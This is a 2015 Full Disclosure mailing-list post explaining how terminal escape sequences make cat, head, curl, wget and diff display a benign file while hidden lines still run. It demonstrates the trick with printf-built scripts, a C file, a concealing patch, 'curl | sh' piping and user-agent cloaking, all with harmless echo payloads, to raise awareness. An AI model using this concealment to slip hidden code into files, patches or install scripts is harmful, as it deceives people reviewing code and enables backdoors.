s/party/hack like it's 1999

[up201407890 () alunos dcc fc up pt]

Federico Bento <up201407890 () alunos dcc fc up pt>

So recently i've encountered a post by Kurt Seifried of RedHat on  
oss-sec's mailing list entitled "Terminal escape sequences - the new  
XSS for admins?"
http://www.openwall.com/lists/oss-security/2015/08/11/8

This is a little misleading title, since escape sequences have been  
introduced circa 70's, so it's actually not that new.

How it technically works:
A terminal escape sequence is a special sequence of characters that is  
printed (like any other text).
If the terminal understands the sequence, it won't display the  
character-sequence, but will perform some action.

While some people might already know what i'm going to present you,  
the majority I believe doesn't, so this is mostly to raise awareness.


$ printf '#!/bin/bash\necho doing something evil!\nexit\n\033[2Aecho  
doing something very nice!\n' > backdoor.sh
$ chmod +x backdoor.sh
$ cat backdoor.sh
#!/bin/bash
echo doing something very nice!
$ ./backdoor.sh
doing something evil!


As you can see, our beloved 'cat' cheated on us. Why?
Because instead of displaying the character-sequence, the escape  
sequence \033[XA (being X the number of times) performed some action.
And this action moves the cursor up X times, overwriting what is above  
it X lines.
But this doesn't affect only 'cat', it affects everything that  
interprets escape sequences.


$ head backdoor.sh
#!/bin/bash
echo doing something very nice!

$ tail backdoor.sh
#!/bin/bash
echo doing something very nice!

$ more backdoor.sh
#!/bin/bash
echo doing something very nice!


It's not over yet!


$ curl 127.0.0.1/backdoor.sh
#!/bin/bash
echo doing something very nice!

$ wget -qO - 127.0.0.1/backdoor.sh
#!/bin/bash
echo doing something very nice!


But if we pipe it into a shell...


$ curl -s 127.0.0.1/backdoor.sh|sh
doing something evil!

$ wget -qO - 127.0.0.1/backdoor.sh|sh
doing something evil!


You might be thinking "If I opened that in my browser, I would detect  
it being malicious!"
Well, think again...
One can have all sorts of fun with user-agents, something that can  
easily come to mind is verifying if the user-agent is from curl or wget,
and make them download the malicious file, if not,
redirect them to a legitimate file that looks like the original  
output. Your browser would fool you then.

I wouldn't even be surprised if most of those install scripts that  
make use of these 'pipe into sh' bullcrap abused this.
I wouldn't even be surprised if most of you were already pwned by  
escape sequences in any situation at all.
Imagine the possibilities, from hidden ssh keys on your  
authorized_keys to options hidden on your configuration files...
It's no secret, most of us rely on 'cat' to view files. I guess this  
is one black kitty, giving you bad luck.


Here's another example with a .c file


$ printf '#include <stdio.h>\n\nint main()\n{\n\tprintf("doing  
something evil\\n");\n\t/*\033[2A\n\t/* This simple program doesnt do  
much... */\n\tprintf("doing something very nice\\n");\n\treturn  
0;\n}\n' > nice.c
$ cat nice.c
#include <stdio.h>

int main()
{
        /* This simple program doesnt do much... */
        printf("doing something very nice\n");
        return 0;
}
$ gcc nice.c
$ ./a.out
doing something evil
doing something very nice


'diff' also interprets escape sequences and so do the resulting patches

going back to the first example, imagine I have a backdoored.sh that  
is backdoored, and a legit.sh that does what it's output tells us.

$ cat backdoor.sh #evil file
#!/bin/bash
echo doing something very nice!

$ cat legit.sh #actually echoes doing something very nice!
#!/bin/bash
echo doing something very nice!


$ diff -Naur backdoor.sh legit.sh
--- backdoor.sh 2015-09-17 16:25:42.985349535 +0100
+++ legit.sh    2015-09-17 16:26:14.950158635 +0100
@@ -1,4 +1,2 @@
 #!/bin/bash
-echo doing something very nice!
+echo doing something very nice!


$ diff -Naur backdoor.sh legit.sh > file.patch
$ patch legit.sh -R file.patch
$ chmod +x legit.sh
$ ./legit.sh
doing something evil!


Hint:
'less' doesn't interpret escape sequences unless the -r switch is used,
so stop aliasing it to 'less -r' just because there's no colored output.


s/party/hack like it's 1999

----------------------------------------------------------------
This message was sent using IMP, the Internet Messaging Program.


_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/